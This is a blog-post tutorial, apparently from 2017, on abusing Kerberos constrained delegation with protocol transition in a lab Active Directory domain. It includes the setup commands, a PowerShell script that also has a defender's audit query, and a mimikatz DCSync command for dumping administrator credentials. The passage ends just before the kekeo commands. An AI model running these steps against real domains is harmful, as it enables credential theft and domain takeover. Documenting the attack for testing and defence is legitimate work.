quarta-feira, 16 de agosto de 2017

kekeo? where are you?

Sometimes, I find security related posts annoying and frustrating. When I try to reproduce their POC, sometimes there is not enough info, other times the tools they reference don't exist anymore. This is the case for kekeo. Every single post I can find uses two tools that I can not use, because they don't exist anymore: s4u.exe and asktgt.exe. These tools were merged into a single one, and I wasn't able to find anything on the new syntax. All I could find was one guy complaining that the ticket generated by the new tool didn't have the forwardable flag set. That's why this tutorial was posted: to document the full attack on constrained delegation with protocol transition, step by step, in a reproducible way. Let's begin.

Context: We have 2 DCs: dc01 and dc02. The domain name is contoso.loca. We will be using a service account named popo, registered with the SPN http/popo. We will grant this account delegation permissions to the LDAP service of dc01 and use them to obtain a service ticket as the domain administrator, which lets us dump user credentials with DCSync.

1. Create the AD account that will be used as the delegated privileged service:

New-ADUser -Name "popo" -UserPrincipalName popo

2. Change the user password:

net user popo popo!!popo /dom

3. Add the SPN:

setspn -S http/popo popo

4. Configure delegation in dsa.msc, on the Delegation tab of the popo account: "Trust this user for delegation to specified services only" with "Use any authentication protocol" (protocol transition), and ldap/dc01.contoso.loca as the allowed service. Delegating to the LDAP service of a DC is what will let us replicate (dump) password hashes from it later.
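The same setup scripted end to end, as an added example (this is not code from the original post): it performs steps 1 to 4 with the ActiveDirectory module instead of dsa.msc, reads back the three attributes that must all be present for the attack to work, and finishes with the query a defender would run to find every account in the domain that has protocol transition enabled. It assumes the RSAT ActiveDirectory module on a host with a domain admin session, and the names from the post (popo, popo!!popo, http/popo, ldap/dc01.contoso.loca); the password in cleartext is kept only for parity with step 2.

```powershell
# Added example, not from the original post. Assumes the RSAT ActiveDirectory
# module, a domain admin session, and the names used in the post.
Import-Module ActiveDirectory

$Account  = 'popo'
$Password = ConvertTo-SecureString 'popo!!popo' -AsPlainText -Force
$Spn      = 'http/popo'
$Target   = 'ldap/dc01.contoso.loca'   # the service popo is allowed to delegate to

# Steps 1 and 2: create the service account enabled and with its password set.
# New-ADUser creates a disabled account unless -Enabled and a password are given.
New-ADUser -Name $Account -UserPrincipalName $Account `
           -AccountPassword $Password -Enabled $true

# Step 3: register the SPN (same effect as: setspn -S http/popo popo)
Set-ADUser -Identity $Account -ServicePrincipalNames @{ Add = $Spn }

# Step 4: constrained delegation with protocol transition. The dsa.msc
# Delegation tab writes two things: the allowed target list in
# msDS-AllowedToDelegateTo, and the TRUSTED_TO_AUTH_FOR_DELEGATION bit
# (0x1000000) in userAccountControl, which is the "Use any authentication
# protocol" option.
Set-ADUser -Identity $Account -Add @{ 'msDS-AllowedToDelegateTo' = $Target }
Set-ADAccountControl -Identity $Account -TrustedToAuthForDelegation $true

# Verify. Without the SPN the account cannot request S4U2Self tickets,
# without the TrustedToAuth bit the S4U2Self ticket is not forwardable,
# and without the target in msDS-AllowedToDelegateTo S4U2Proxy is refused.
Get-ADUser -Identity $Account `
    -Properties ServicePrincipalNames, 'msDS-AllowedToDelegateTo', TrustedToAuthForDelegation |
    Select-Object Name, ServicePrincipalNames, 'msDS-AllowedToDelegateTo', TrustedToAuthForDelegation

# Defender's check: every account that can do protocol transition, with the
# services it may delegate to. Each of these can impersonate any user that is
# not marked "sensitive and cannot be delegated" or a member of Protected
# Users against the listed services; a DC LDAP entry means DCSync.
$TrustedToAuth = 0x1000000
Get-ADObject -LDAPFilter "(&(msDS-AllowedToDelegateTo=*)(userAccountControl:1.2.840.113556.1.4.803:=$TrustedToAuth))" `
    -Properties 'msDS-AllowedToDelegateTo' |
    Select-Object Name, @{ n = 'DelegateTo'; e = { $_.'msDS-AllowedToDelegateTo' -join ', ' } }
```

The last query is the one worth keeping: an entry whose target list contains ldap/, cifs/ or host/ of a domain controller is equivalent to a domain admin credential and should be treated as such when reviewing who holds it.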

We now have everything we need to begin our tests. Let's first try to dump the domain administrator credentials from popo's own session, before any delegation trick. To do this, open mimikatz and run:

lsadump::dcsync /domain:contoso.loca /user:CONTOSO\administrator

As you can see, we get access denied, which is expected at this point: popo has no replication rights of its own.
Now kekeo enters the picture. Run kekeo.exe and: